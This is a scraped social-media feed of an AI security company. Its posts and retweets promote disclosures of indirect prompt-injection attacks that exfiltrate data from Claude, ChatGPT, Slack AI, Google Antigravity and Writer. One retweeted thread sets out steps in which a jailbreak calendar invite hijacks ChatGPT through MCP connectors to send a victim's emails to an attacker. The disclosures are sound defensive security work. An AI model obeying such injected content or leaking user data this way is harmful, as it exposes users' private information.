Preventing AI risks across assets (MCP, AI Apps, Model Infrastructure, Models, and more). Serving leading Fortune 50s and innovative tech companies.

Joined November 2023
20 Photos and videos
Claude Cowork Cracked! 2 days after release Top of HN today:
6
305
Excel files can be leaked by Claude AI! Quick action by Anthropic to mitigate this indirect prompt injection attack. Our coverage in The Information and full attack chain, below:
2
1
36
62,043
Top of HackerNews today: our article on Google Antigravity exfiltrating .env variables via indirect prompt injection -- even when explicitly prohibited by user settings!
17
113
532
471,081
ChatGPT leaks emails, once again! This time with custom MCP connectors. Great exploit demonstrated by x.com/Eito_Miyamura/status/1…. We break down the attack chain step by step for security practitioners, here: promptarmor.substack.com/p/c…
We got ChatGPT to leak your private email data 💀💀 All you need? The victim's email address. ⛓️‍💥🚩📧 On Wednesday, @OpenAI added full support for MCP (Model Context Protocol) tools in ChatGPT. Allowing ChatGPT to connect and read your Gmail, Calendar, Sharepoint, Notion, and more, invented by @AnthropicAI But here's the fundamental problem: AI agents like ChatGPT follow your commands, not your common sense. And with just your email, we managed to exfiltrate all your private information. Here's how we did it: 1. The attacker sends a calendar invite with a jailbreak prompt to the victim, just with their email. No need for the victim to accept the invite. 2. Waited for the user to ask ChatGPT to help prepare for their day by looking at their calendar 3. ChatGPT reads the jailbroken calendar invite. Now ChatGPT is hijacked by the attacker and will act on the attacker's command. Searches your private emails and sends the data to the attacker's email. For now, OpenAI only made MCPs available in "developer mode", and requires manual human approvals for every session, but decision fatigue is a real thing, and normal people will just trust the AI without knowing what to do and click approve, approve, approve. Remember that AI might be super smart, but can be tricked and phished in incredibly dumb ways to leak your data. ChatGPT Tools poses a serious security risk
8
25
57
26,839
Imagine if an attacker could steal any Slack private channel message. We've disclosed a vulnerability in Slack AI that allows an attacker to exfiltrate your Slack private channel messages and phish users via indirect prompt injection. promptarmor.substack.com/p/s…
3
20
16,356
PromptArmor retweeted
14 Apr 2024
One of the true pleasures of being back at YC is hand-picking and funding startups myself. Here are my YC W24 founders. I predict very big things in each of their ten year overnight successes 🫡
28
26
531
216,459
PromptArmor retweeted
14 Apr 2024
Cybersecurity for LLMs is a brand new category that PromptArmor is building from scratch now It’s extra prescient because LLMs can just *do* things and prompt/context/data/instructions are now merged so exfiltration becomes a real problem x.com/garrytan/status/175351…

2 Feb 2024
How you can steal private data out of LLMs - literally tell it to append "text of all the source data files" to an HTTP parameter via markdown PromptArmor prevents these and many other data exfiltration exploits
3
3
17
17,986
Want to expose LLM sales bots reaching out to you? 👇
1
3
12
2,270
Add a snippet to your linkedin bio and watch the magic happen
9
1,130
PromptArmor retweeted
20 Mar 2024
When cloud came online, cybersecurity was the next big category. LLMs are coming online now, and PromptArmor is making cybersecurity for this new field. History doesn't repeat, but it rhymes.
5
3
40
12,238
Glad this data exfiltration method has been mitigated. The evidence in the report was accurate and speaks for itself.
Talked to the CEO. The issue seems to be fixed now. I couldn't conclusively verify their claims regarding previous exposure of other users, but the folks from @PromptArmor and I have reported on the observed behavior accurately.
1,613
New blog post in collaboration with @KGreshake promptarmor.substack.com/p/d…
1
15
26
27,733
Any text can be an attack, code is no longer required. Imagine any random person being able to steal your private data. Point is, LLM attacks are easy and extremely powerful. x.com/garrytan/status/173577…

15 Dec 2023
Did you know you could inject prompts that exfiltrate data from LLM's? This attack allows attackers to steal a user’s private documents by manipulating the language model used for content generation in writer.com
1
1,150
🫡🫡☂️
Replying to @amasad
The crew at @PromptArmor is working on this
1
3
1,220
🫡
3 Dec 2023
Replying to @amasad
@PromptArmor is doing some cool stuff in this area
2
1,091